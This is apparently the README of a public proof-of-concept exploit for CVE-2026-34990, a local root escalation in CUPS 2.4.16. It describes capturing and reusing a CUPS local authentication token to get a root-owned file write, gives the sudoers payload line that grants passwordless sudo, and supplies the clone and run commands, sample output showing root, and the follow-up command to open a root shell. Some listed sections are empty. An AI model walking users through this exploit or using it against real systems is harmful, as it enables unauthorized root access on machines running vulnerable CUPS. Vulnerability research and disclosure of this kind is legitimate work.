
Generic PoC for CVE-2026-34990 - CUPS 2.4.16 Local Privilege Escalation via Local token disclosure and arbitrary root file overwrite.
A generic proof-of-concept for CVE-2026-34990, a local privilege escalation vulnerability affecting CUPS 2.4.16.
The exploit demonstrates how a local unprivileged user can abuse CUPS local authentication and printer configuration behavior to obtain an arbitrary file write as root and escalate privileges.
CVE-2026-34990 was originally reported by:
Asim Viladi Oglu Manizada (@manizada)
I am not the discoverer of this vulnerability.
This repository contains my adapted and tested proof-of-concept implementation based on publicly disclosed technical information.
At a high level, the exploit chain is:
Local unprivileged user
|
v
Create temporary CUPS printer
|
v
Trigger outbound IPP authentication
|
v
Capture Authorization: Local token
|
v
Reuse token against privileged CUPS operations
|
v
Create/persist file:// printer
|
v
Submit print job
|
v
Root-owned arbitrary file write
|
v
Privilege escalation
The PoC uses the current local username automatically.
For example, when executed as:
alice
the demonstration payload targets:
/etc/sudoers.d/alice-pwn
and attempts to write:
alice ALL=(ALL) NOPASSWD: ALL
A successful exploit can then be verified with:
sudo -n id
Example:
uid=0(root) gid=0(root) groups=0(root)
The PoC expects:
ipptoollplpstatCheck the CUPS version:
cups-config --version
Check that the scheduler is running:
lpstat -r
Check the local CUPS listener:
ss -lnt | grep 631
Clone the repository:
git clone https://github.com/Noorkhalel/CVE-2026-34990-CUPS-LPE-PoC.git
cd CVE-2026-34990-CUPS-LPE-PoC
Run:
python3 exploit.py
Example output:
[*] user: <local-user>
[*] target: /etc/sudoers.d/<local-user>-pwn
[+] Local token: <LOCAL_TOKEN>
[*] attempt 1: <printer-name>
[+] ROOT via sudoers
uid=0(root) gid=0(root) groups=0(root)
[*] next: sudo -n bash
After successful exploitation:
sudo -n bash
This PoC is intentionally written as a generic implementation of the publicly disclosed CVE.
It does not contain:
This code is provided for:
Only use this code on systems you own or systems for which you have explicit authorization.
The author is not responsible for misuse of this software.
Vulnerability discovery:
Asim Viladi Oglu Manizada (@manizada)
PoC adaptation, testing, and documentation:
Noor Khalil